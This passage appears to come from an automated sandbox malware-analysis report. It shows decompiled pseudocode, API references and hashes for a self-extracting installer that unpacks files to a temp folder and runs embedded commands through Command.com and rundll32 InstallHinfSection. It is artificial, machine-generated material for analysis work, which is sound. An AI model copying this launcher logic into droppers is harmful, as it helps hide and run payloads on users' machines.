                              				}
                              				E010E71EF(_t6);
                              				return 0;
                              			}









                              APIs
                                • Part of subcall function 010E6FBE: GetModuleHandleW.KERNEL32(00000000), ref: 010E6FC5
                              • __set_app_type.MSVCRT ref: 010E69C2
                              • __p__fmode.MSVCRT ref: 010E69D8
                              • __p__commode.MSVCRT ref: 010E69E6
                              • __setusermatherr.MSVCRT ref: 010E6A07
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                              • String ID:
                              • API String ID: 1632413811-0
                              • Opcode ID: a4779e4dab892187234cf3fe03e87d4cacdf896e136f6932e7c3d599e8fad097
                              • Instruction ID: 7c6d10c152326dcdace8bd71c8d3d99b823a3a198dd28e055e05585cd4c5c624
                              • Opcode Fuzzy Hash: a4779e4dab892187234cf3fe03e87d4cacdf896e136f6932e7c3d599e8fad097
                              • Instruction Fuzzy Hash: DFF0DA74A04311CFC6786B3BF60D6043BE2EB18B21B10464AE4E19E2D8CF3F81408B10
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Execution Graph

                              Execution Coverage:26.9%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:0%
                              Total number of Nodes:969
                              Total number of Limit Nodes:42

                              Callgraph


                              Control-flow Graph

                              C-Code - Quality: 82%
                              			E00A73BA2() {
                              				signed int _v8;
                              				signed int _v12;
                              				char _v276;
                              				char _v280;
                              				short _v300;
                              				intOrPtr _v304;
                              				void _v348;
                              				char _v352;
                              				intOrPtr _v356;
                              				signed int _v360;
                              				short _v364;
                              				char* _v368;
                              				intOrPtr _v372;
                              				void* _v376;
                              				intOrPtr _v380;
                              				char _v384;
                              				signed int _v388;
                              				intOrPtr _v392;
                              				signed int _v396;
                              				signed int _v400;
                              				signed int _v404;
                              				void* _v408;
                              				void* _v424;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t69;
                              				signed int _t76;
                              				void* _t77;
                              				signed int _t79;
                              				short _t96;
                              				signed int _t97;
                              				intOrPtr _t98;
                              				signed int _t101;
                              				signed int _t104;
                              				signed int _t108;
                              				int _t112;
                              				void* _t115;
                              				signed char _t118;
                              				void* _t125;
                              				signed int _t127;
                              				void* _t128;
                              				struct HINSTANCE__* _t129;
                              				void* _t130;
                              				short _t137;
                              				char* _t140;
                              				signed char _t144;
                              				signed char _t145;
                              				signed int _t149;
                              				void* _t150;
                              				void* _t151;
                              				signed int _t153;
                              				void* _t155;
                              				void* _t156;
                              				signed int _t157;
                              				signed int _t162;
                              				signed int _t164;
                              				void* _t165;
                              
                              				_t164 = (_t162 & 0xfffffff8) - 0x194;
                              				_t69 =  *0xa78004; // 0x74742267
                              				_v8 = _t69 ^ _t164;
                              				_t153 = 0;
                              				 *0xa79124 =  *0xa79124 & 0;
                              				_t149 = 0;
                              				_v388 = 0;
                              				_v384 = 0;
                              				_t165 =  *0xa78a28 - _t153; // 0x0
                              				if(_t165 != 0) {
                              					L3:
                              					_t127 = 0;
                              					_v392 = 0;
                              					while(1) {
                              						_v400 = _v400 & 0x00000000;
                              						memset( &_v348, 0, 0x44);
                              						_t164 = _t164 + 0xc;
                              						_v348 = 0x44;
                              						if( *0xa78c42 != 0) {
                              							goto L26;
                              						}
                              						_t146 =  &_v396;
                              						_t115 = E00A7468F("SHOWWINDOW",  &_v396, 4);
                              						if(_t115 == 0 || _t115 > 4) {
                              							L25:
                              							_t146 = 0x4b1;
                              							E00A744B9(0, 0x4b1, 0, 0, 0x10, 0);
                              							 *0xa79124 = 0x80070714;
                              							goto L62;
                              						} else {
                              							if(_v396 != 1) {
                              								__eflags = _v396 - 2;
                              								if(_v396 != 2) {
                              									_t137 = 3;
                              									__eflags = _v396 - _t137;
                              									if(_v396 == _t137) {
                              										_v304 = 1;
                              										_v300 = _t137;
                              									}
                              									goto L14;
                              								}
                              								_push(6);
                              								_v304 = 1;
                              								_pop(0);
                              								goto L11;
                              							} else {
                              								_v304 = 1;
                              								L11:
                              								_v300 = 0;
                              								L14:
                              								if(_t127 != 0) {
                              									L27:
                              									_t155 = 1;
                              									__eflags = _t127 - 1;
                              									if(_t127 != 1) {
                              										L31:
                              										_t132 =  &_v280;
                              										_t76 = E00A71AE8( &_v280,  &_v408,  &_v404); // executed
                              										__eflags = _t76;
                              										if(_t76 == 0) {
                              											L62:
                              											_t77 = 0;
                              											L63:
                              											_pop(_t150);
                              											_pop(_t156);
                              											_pop(_t128);
                              											return E00A76CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                              										}
                              										_t157 = _v404;
                              										__eflags = _t149;
                              										if(_t149 != 0) {
                              											L37:
                              											__eflags = _t157;
                              											if(_t157 == 0) {
                              												L57:
                              												_t151 = _v408;
                              												_t146 =  &_v352;
                              												_t130 = _t151; // executed
                              												_t79 = E00A73FEF(_t130,  &_v352); // executed
                              												__eflags = _t79;
                              												if(_t79 == 0) {
                              													L61:
                              													LocalFree(_t151);
                              													goto L62;
                              												}
                              												L58:
                              												LocalFree(_t151);
                              												_t127 = _t127 + 1;
                              												_v396 = _t127;
                              												__eflags = _t127 - 2;
                              												if(_t127 >= 2) {
                              													_t155 = 1;
                              													__eflags = 1;
                              													L69:
                              													__eflags =  *0xa78580;
                              													if( *0xa78580 != 0) {
                              														E00A72267();
                              													}
                              													_t77 = _t155;
                              													goto L63;
                              												}
                              												_t153 = _v392;
                              												_t149 = _v388;
                              												continue;
                              											}
                              											L38:
                              											__eflags =  *0xa78180;
                              											if( *0xa78180 == 0) {
                              												_t146 = 0x4c7;
                              												E00A744B9(0, 0x4c7, 0, 0, 0x10, 0);
                              												LocalFree(_v424);
                              												 *0xa79124 = 0x8007042b;
                              												goto L62;
                              											}
                              											__eflags = _t157;
                              											if(_t157 == 0) {
                              												goto L57;
                              											}
                              											__eflags =  *0xa79a34 & 0x00000004;
                              											if(__eflags == 0) {
                              												goto L57;
                              											}
                              											_t129 = E00A76495(_t127, _t132, _t157, __eflags);
                              											__eflags = _t129;
                              											if(_t129 == 0) {
                              												_t146 = 0x4c8;
                              												E00A744B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                              												L65:
                              												LocalFree(_v408);
                              												 *0xa79124 = E00A76285();
                              												goto L62;
                              											}
                              											_t146 = GetProcAddress(_t129, "DoInfInstall");
                              											_v404 = _t146;
                              											__eflags = _t146;
                              											if(_t146 == 0) {
                              												_t146 = 0x4c9;
                              												__eflags = 0;
                              												E00A744B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                              												FreeLibrary(_t129);
                              												goto L65;
                              											}
                              											__eflags =  *0xa78a30;
                              											_t151 = _v408;
                              											_v384 = 0;
                              											_v368 =  &_v280;
                              											_t96 =  *0xa79a40; // 0x3
                              											_v364 = _t96;
                              											_t97 =  *0xa78a38 & 0x0000ffff;
                              											_v380 = 0xa79154;
                              											_v376 = _t151;
                              											_v372 = 0xa791e4;
                              											_v360 = _t97;
                              											if( *0xa78a30 != 0) {
                              												_t97 = _t97 | 0x00010000;
                              												__eflags = _t97;
                              												_v360 = _t97;
                              											}
                              											_t144 =  *0xa79a34; // 0x1
                              											__eflags = _t144 & 0x00000008;
                              											if((_t144 & 0x00000008) != 0) {
                              												_t97 = _t97 | 0x00020000;
                              												__eflags = _t97;
                              												_v360 = _t97;
                              											}
                              											__eflags = _t144 & 0x00000010;
                              											if((_t144 & 0x00000010) != 0) {
                              												_t97 = _t97 | 0x00040000;
                              												__eflags = _t97;
                              												_v360 = _t97;
                              											}
                              											_t145 =  *0xa78d48; // 0x0
                              											__eflags = _t145 & 0x00000040;
                              											if((_t145 & 0x00000040) != 0) {
                              												_t97 = _t97 | 0x00080000;
                              												__eflags = _t97;
                              												_v360 = _t97;
                              											}
                              											__eflags = _t145;
                              											if(_t145 < 0) {
                              												_t104 = _t97 | 0x00100000;
                              												__eflags = _t104;
                              												_v360 = _t104;
                              											}
                              											_t98 =  *0xa79a38; // 0x0
                              											_v356 = _t98;
                              											_t130 = _t146;
                              											 *0xa7a288( &_v384);
                              											_t101 = _v404();
                              											__eflags = _t164 - _t164;
                              											if(_t164 != _t164) {
                              												_t130 = 4;
                              												asm("int 0x29");
                              											}
                              											 *0xa79124 = _t101;
                              											_push(_t129);
                              											__eflags = _t101;
                              											if(_t101 < 0) {
                              												FreeLibrary();
                              												goto L61;
                              											} else {
                              												FreeLibrary();
                              												_t127 = _v400;
                              												goto L58;
                              											}
                              										}
                              										__eflags =  *0xa79a40 - 1; // 0x3
                              										if(__eflags == 0) {
                              											goto L37;
                              										}
                              										__eflags =  *0xa78a20;
                              										if( *0xa78a20 == 0) {
                              											goto L37;
                              										}
                              										__eflags = _t157;
                              										if(_t157 != 0) {
                              											goto L38;
                              										}
                              										_v388 = 1;
                              										E00A7202A(_t146); // executed
                              										goto L37;
                              									}
                              									_t146 =  &_v280;
                              									_t108 = E00A7468F("POSTRUNPROGRAM",  &_v280, 0x104);
                              									__eflags = _t108;
                              									if(_t108 == 0) {
                              										goto L25;
                              									}
                              									__eflags =  *0xa78c42;
                              									if( *0xa78c42 != 0) {
                              										goto L69;
                              									}
                              									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                              									__eflags = _t112 == 0;
                              									if(_t112 == 0) {
                              										goto L69;
                              									}
                              									goto L31;
                              								}
                              								_t118 =  *0xa78a38; // 0x0
                              								if(_t118 == 0) {
                              									L23:
                              									if(_t153 != 0) {
                              										goto L31;
                              									}
                              									_t146 =  &_v276;
                              									if(E00A7468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                              										goto L27;
                              									}
                              									goto L25;
                              								}
                              								if((_t118 & 0x00000001) == 0) {
                              									__eflags = _t118 & 0x00000002;
                              									if((_t118 & 0x00000002) == 0) {
                              										goto L62;
                              									}
                              									_t140 = "USRQCMD";
                              									L20:
                              									_t146 =  &_v276;
                              									if(E00A7468F(_t140,  &_v276, 0x104) == 0) {
                              										goto L25;
                              									}
                              									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                              										_t153 = 1;
                              										_v388 = 1;
                              									}
                              									goto L23;
                              								}
                              								_t140 = "ADMQCMD";
                              								goto L20;
                              							}
                              						}
                              						L26:
                              						_push(_t130);
                              						_t146 = 0x104;
                              						E00A71781( &_v276, 0x104, _t130, 0xa78c42);
                              						goto L27;
                              					}
                              				}
                              				_t130 = "REBOOT";
                              				_t125 = E00A7468F(_t130, 0xa79a2c, 4);
                              				if(_t125 == 0 || _t125 > 4) {
                              					goto L25;
                              				} else {
                              					goto L3;
                              				}
                              			}
                              0x00a73eea
                              0x00a73eec
                              0x00a73eee
                              0x00a73ef3
                              0x00a73ef3
                              0x00a73ef5
                              0x00a73efa
                              0x00a73efb
                              0x00a73efd
                              0x00a73f40
                              0x00000000
                              0x00a73eff
                              0x00a73eff
                              0x00a73f05
                              0x00000000
                              0x00a73f05
                              0x00a73efd
                              0x00a73dc7
                              0x00a73dce
                              0x00000000
                              0x00000000
                              0x00a73dd0
                              0x00a73dd7
                              0x00000000
                              0x00000000
                              0x00a73dd9
                              0x00a73ddb
                              0x00000000
                              0x00000000
                              0x00a73ddd
                              0x00a73de1
                              0x00000000
                              0x00a73de1
                              0x00a73d59
                              0x00a73d65
                              0x00a73d6a
                              0x00a73d6c
                              0x00000000
                              0x00000000
                              0x00a73d6e
                              0x00a73d75
                              0x00000000
                              0x00000000
                              0x00a73d8f
                              0x00a73d96
                              0x00a73d98
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00a73d98
                              0x00a73c8f
                              0x00a73c98
                              0x00a73cf1
                              0x00a73cf3
                              0x00000000
                              0x00000000
                              0x00a73cfe
                              0x00a73d11
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00a73d11
                              0x00a73c9c
                              0x00a73ca5
                              0x00a73ca7
                              0x00000000
                              0x00000000
                              0x00a73cad
                              0x00a73cb2
                              0x00a73cb7
                              0x00a73cc5
                              0x00000000
                              0x00000000
                              0x00a73ce8
                              0x00a73cec
                              0x00a73ced
                              0x00a73ced
                              0x00000000
                              0x00a73ce8
                              0x00a73c9e
                              0x00000000
                              0x00a73c9e
                              0x00a73c56
                              0x00a73d35
                              0x00a73d35
                              0x00a73d3c
                              0x00a73d48
                              0x00000000
                              0x00a73d48
                              0x00a73c03
                              0x00a73be2
                              0x00a73be7
                              0x00a73bee
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000

                              APIs
                              • memset.MSVCRT ref: 00A73C11
                              • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00A73CDC
                                • Part of subcall function 00A7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A746A0
                                • Part of subcall function 00A7468F: SizeofResource.KERNEL32(00000000,00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746A9
                                • Part of subcall function 00A7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A746C3
                                • Part of subcall function 00A7468F: LoadResource.KERNEL32(00000000,00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746CC
                                • Part of subcall function 00A7468F: LockResource.KERNEL32(00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746D3
                                • Part of subcall function 00A7468F: memcpy_s.MSVCRT ref: 00A746E5
                                • Part of subcall function 00A7468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746EF
                              • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00A78C42), ref: 00A73D8F
                              • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00A73E26
                              • FreeLibrary.KERNEL32(00000000,?,00A78C42), ref: 00A73EFF
                              • LocalFree.KERNEL32(?,?,?,?,00A78C42), ref: 00A73F1F
                              • FreeLibrary.KERNEL32(00000000,?,00A78C42), ref: 00A73F40
                              • LocalFree.KERNEL32(?,?,?,?,00A78C42), ref: 00A73F47
                              • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00A78C42), ref: 00A73F76
                              • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00A78C42), ref: 00A73F80
                              • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00A78C42), ref: 00A73FC2
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                              • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$lenta
                              • API String ID: 1032054927-139961720
                              • Opcode ID: 9de18a3654e0f3e8c4d8df1b8cd782f225b4fa145c6522ba80966af28bbe9e28
                              • Instruction ID: d15ad61627e4ffc6d1af379162ac8928ead3c16bba6aeb1c63fe9f44e17f8721
                              • Opcode Fuzzy Hash: 9de18a3654e0f3e8c4d8df1b8cd782f225b4fa145c6522ba80966af28bbe9e28
                              • Instruction Fuzzy Hash: B2B124726083019BDB30DF648D45B6B77E8EB84740F02C92EFA8DD6191DB74C986DB92
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph: function 00A71AE8 (legend: Executed / Not Executed)
                              C-Code - Quality: 82%
                              			E00A71AE8(long __ecx, CHAR** _a4, int* _a8) {
                              				signed int _v8;
                              				char _v268;
                              				char _v527;
                              				char _v528;
                              				char _v1552;
                              				CHAR* _v1556;
                              				int* _v1560;
                              				CHAR** _v1564;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t48;
                              				CHAR* _t53;
                              				CHAR* _t54;
                              				char* _t57;
                              				char* _t58;
                              				CHAR* _t60;
                              				void* _t62;
                              				signed char _t65;
                              				intOrPtr _t76;
                              				intOrPtr _t77;
                              				unsigned int _t85;
                              				CHAR* _t90;
                              				CHAR* _t92;
                              				char _t105;
                              				char _t106;
                              				CHAR** _t111;
                              				CHAR* _t115;
                              				intOrPtr* _t125;
                              				void* _t126;
                              				CHAR* _t132;
                              				CHAR* _t135;
                              				void* _t138;
                              				void* _t139;
                              				void* _t145;
                              				intOrPtr* _t146;
                              				char* _t148;
                              				CHAR* _t151;
                              				void* _t152;
                              				CHAR* _t155;
                              				CHAR* _t156;
                              				void* _t157;
                              				signed int _t158;
                              
                              				_t48 =  *0xa78004; // 0x74742267
                              				_v8 = _t48 ^ _t158;
                              				_t108 = __ecx;
                              				_v1564 = _a4;
                              				_v1560 = _a8;
                              				E00A71680( &_v528, 0x104, __ecx);
                              				if(_v528 != 0x22) {
                              					_t135 = " ";
                              					_t53 =  &_v528;
                              				} else {
                              					_t135 = "\"";
                              					_t53 =  &_v527;
                              				}
                              				_t111 =  &_v1556;
                              				_v1556 = _t53;
                              				_t54 = E00A71A84(_t111, _t135);
                              				_t156 = _v1556;
                              				_t151 = _t54;
                              				if(_t156 == 0) {
                              					L12:
                              					_push(_t111);
                              					E00A71781( &_v268, 0x104, _t111, "C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
                              					E00A7658A( &_v268, 0x104, _t156);
                              					goto L13;
                              				} else {
                              					_t132 = _t156;
                              					_t148 =  &(_t132[1]);
                              					do {
                              						_t105 =  *_t132;
                              						_t132 =  &(_t132[1]);
                              					} while (_t105 != 0);
                              					_t111 = _t132 - _t148;
                              					if(_t111 < 3) {
                              						goto L12;
                              					}
                              					_t106 = _t156[1];
                              					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                              						if( *_t156 != 0x5c || _t106 != 0x5c) {
                              							goto L12;
                              						} else {
                              							goto L11;
                              						}
                              					} else {
                              						L11:
                              						E00A71680( &_v268, 0x104, _t156);
                              						L13:
                              						_t138 = 0x2e;
                              						_t57 = E00A766C8(_t156, _t138);
                              						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                              							_t139 = 0x2e;
                              							_t115 = _t156;
                              							_t58 = E00A766C8(_t115, _t139);
                              							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                              								_t156 = LocalAlloc(0x40, 0x400);
                              								if(_t156 == 0) {
                              									goto L43;
                              								}
                              								_t65 = GetFileAttributesA( &_v268); // executed
                              								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                              									E00A71680( &_v1552, 0x400, _t108);
                              								} else {
                              									_push(_t115);
                              									_t108 = 0x400;
                              									E00A71781( &_v1552, 0x400, _t115,  &_v268);
                              									if(_t151 != 0 &&  *_t151 != 0) {
                              										E00A716B3( &_v1552, 0x400, " ");
                              										E00A716B3( &_v1552, 0x400, _t151);
                              									}
                              								}
                              								_t140 = _t156;
                              								 *_t156 = 0;
                              								E00A72AAC( &_v1552, _t156, _t156);
                              								goto L53;
                              							} else {
                              								_t108 = "Command.com /c %s";
                              								_t125 = "Command.com /c %s";
                              								_t145 = _t125 + 1;
                              								do {
                              									_t76 =  *_t125;
                              									_t125 = _t125 + 1;
                              								} while (_t76 != 0);
                              								_t126 = _t125 - _t145;
                              								_t146 =  &_v268;
                              								_t157 = _t146 + 1;
                              								do {
                              									_t77 =  *_t146;
                              									_t146 = _t146 + 1;
                              								} while (_t77 != 0);
                              								_t140 = _t146 - _t157;
                              								_t154 = _t126 + 8 + _t146 - _t157;
                              								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                              								if(_t156 != 0) {
                              									E00A7171E(_t156, _t154, "Command.com /c %s",  &_v268);
                              									goto L53;
                              								}
                              								goto L43;
                              							}
                              						} else {
                              							_t85 = GetFileAttributesA( &_v268);
                              							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                              								_t140 = 0x525;
                              								_push(0);
                              								_push(0x10);
                              								_push(0);
                              								_t60 =  &_v268;
                              								goto L35;
                              							} else {
                              								_t140 = "[";
                              								_v1556 = _t151;
                              								_t90 = E00A71A84( &_v1556, "[");
                              								if(_t90 != 0) {
                              									if( *_t90 != 0) {
                              										_v1556 = _t90;
                              									}
                              									_t140 = "]";
                              									E00A71A84( &_v1556, "]");
                              								}
                              								_t156 = LocalAlloc(0x40, 0x200);
                              								if(_t156 == 0) {
                              									L43:
                              									_t60 = 0;
                              									_t140 = 0x4b5;
                              									_push(0);
                              									_push(0x10);
                              									_push(0);
                              									L35:
                              									_push(_t60);
                              									E00A744B9(0, _t140);
                              									_t62 = 0;
                              									goto L54;
                              								} else {
                              									_t155 = _v1556;
                              									_t92 = _t155;
                              									if( *_t155 == 0) {
                              										_t92 = "DefaultInstall";
                              									}
                              									 *0xa79120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                              									 *_v1560 = 1;
                              									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0xa71140, _t156, 8,  &_v268) == 0) {
                              										 *0xa79a34 =  *0xa79a34 & 0xfffffffb;
                              										if( *0xa79a40 != 0) {
                              											_t108 = "setupapi.dll";
                              										} else {
                              											_t108 = "setupx.dll";
                              											GetShortPathNameA( &_v268,  &_v268, 0x104);
                              										}
                              										if( *_t155 == 0) {
                              											_t155 = "DefaultInstall";
                              										}
                              										_push( &_v268);
                              										_push(_t155);
                              										E00A7171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                              									} else {
                              										 *0xa79a34 =  *0xa79a34 | 0x00000004;
                              										if( *_t155 == 0) {
                              											_t155 = "DefaultInstall";
                              										}
                              										E00A71680(_t108, 0x104, _t155);
                              										_t140 = 0x200;
                              										E00A71680(_t156, 0x200,  &_v268);
                              									}
                              									L53:
                              									_t62 = 1;
                              									 *_v1564 = _t156;
                              									L54:
                              									_pop(_t152);
                              									return E00A76CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                              								}
                              							}
                              						}
                              					}
                              				}
                              			}

                              APIs
                              • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00A71BE7
                              • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00A71BFE
                              • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00A71C57
                              • GetPrivateProfileIntA.KERNEL32 ref: 00A71C88
                              • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00A71140,00000000,00000008,?), ref: 00A71CB8
                              • GetShortPathNameA.KERNEL32 ref: 00A71D1B
                                • Part of subcall function 00A744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A74518
                                • Part of subcall function 00A744B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A74554
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                              • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                              • API String ID: 383838535-819679500
                              • Opcode ID: a9003cd272c7b228aabf165e0e92a9aa3d8fd4d7cf6ec0565496a3d0a2742870
                              • Instruction ID: 87251022e822e63d5cb9b1278ff16c75ecdb426dda28cc2759014819670e2c48
                              • Opcode Fuzzy Hash: a9003cd272c7b228aabf165e0e92a9aa3d8fd4d7cf6ec0565496a3d0a2742870
                              • Instruction Fuzzy Hash: EBA11870A002146BEB20DB2CCC45BEA77E9EB95310F54C6A9E55DA72C1DBB09D86CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 406 a72f1d-a72f3d 407 a72f3f-a72f46 406->407 408 a72f6c-a72f73 call a75164 406->408 410 a72f5f-a72f66 call a73a3f 407->410 411 a72f48 call a751e5 407->411 415 a73041 408->415 416 a72f79-a72f80 call a755a0 408->416 410->408 410->415 417 a72f4d-a72f4f 411->417 420 a73043-a73053 call a76ce0 415->420 416->415 424 a72f86-a72fbe GetSystemDirectoryA call a7658a LoadLibraryA 416->424 417->415 421 a72f55-a72f5d 417->421 421->408 421->410 428 a72ff7-a73004 FreeLibrary 424->428 429 a72fc0-a72fd4 GetProcAddress 424->429 431 a73017-a73024 SetCurrentDirectoryA 428->431 432 a73006-a7300c 428->432 429->428 430 a72fd6-a72fee DecryptFileA 429->430 430->428 445 a72ff0-a72ff5 430->445 434 a73026-a7303c call a744b9 call a76285 431->434 435 a73054-a7305a 431->435 432->431 433 a7300e call a7621e 432->433 441 a73013-a73015 433->441 434->415 439 a73065-a7306c 435->439 440 a7305c call a73b26 435->440 442 a7306e-a73075 call a7256d 439->442 443 a7307c-a73089 439->443 447 a73061-a73063 440->447 441->415 441->431 452 a7307a 442->452 449 a730a1-a730a9 443->449 450 a7308b-a73091 443->450 445->428 447->415 447->439 455 a730b4-a730b7 449->455 456 a730ab-a730ad 449->456 450->449 453 a73093 call a73ba2 450->453 452->443 459 a73098-a7309a 453->459 455->420 456->455 458 a730af call a74169 456->458 458->455 459->415 461 a7309c 459->461 461->449
                              C-Code - Quality: 82%
                              			E00A72F1D(void* __ecx, int __edx) {
                              				signed int _v8;
                              				char _v272;
                              				_Unknown_base(*)()* _v276;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t9;
                              				void* _t11;
                              				struct HWND__* _t12;
                              				void* _t14;
                              				int _t21;
                              				signed int _t22;
                              				signed int _t25;
                              				intOrPtr* _t26;
                              				signed int _t27;
                              				void* _t30;
                              				_Unknown_base(*)()* _t31;
                              				void* _t34;
                              				struct HINSTANCE__* _t36;
                              				intOrPtr _t41;
                              				intOrPtr* _t44;
                              				signed int _t46;
                              				int _t47;
                              				void* _t58;
                              				void* _t59;
                              
                              				_t43 = __edx;
                              				_t9 =  *0xa78004; // 0x74742267
                              				_v8 = _t9 ^ _t46;
                              				if( *0xa78a38 != 0) {
                              					L5:
                              					_t11 = E00A75164(_t52);
                              					_t53 = _t11;
                              					if(_t11 == 0) {
                              						L16:
                              						_t12 = 0;
                              						L17:
                              						return E00A76CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                              					}
                              					_t14 = E00A755A0(_t53); // executed
                              					if(_t14 == 0) {
                              						goto L16;
                              					} else {
                              						_t45 = 0x105;
                              						GetSystemDirectoryA( &_v272, 0x105);
                              						_t43 = 0x105;
                              						_t40 =  &_v272;
                              						E00A7658A( &_v272, 0x105, "advapi32.dll");
                              						_t36 = LoadLibraryA( &_v272);
                              						_t44 = 0;
                              						if(_t36 != 0) {
                              							_t31 = GetProcAddress(_t36, "DecryptFileA");
                              							_v276 = _t31;
                              							if(_t31 != 0) {
                              								_t45 = _t47;
                              								_t40 = _t31;
                              								 *0xa7a288("C:\Users\jones\AppData\Local\Temp\IXP001.TMP\", 0); // executed
                              								_v276();
                              								if(_t47 != _t47) {
                              									_t40 = 4;
                              									asm("int 0x29");
                              								}
                              							}
                              						}
                              						FreeLibrary(_t36);
                              						_t58 =  *0xa78a24 - _t44; // 0x0
                              						if(_t58 != 0) {
                              							L14:
                              							_t21 = SetCurrentDirectoryA("C:\Users\jones\AppData\Local\Temp\IXP001.TMP\"); // executed
                              							if(_t21 != 0) {
                              								__eflags =  *0xa78a2c - _t44; // 0x0
                              								if(__eflags != 0) {
                              									L20:
                              									__eflags =  *0xa78d48 & 0x000000c0;
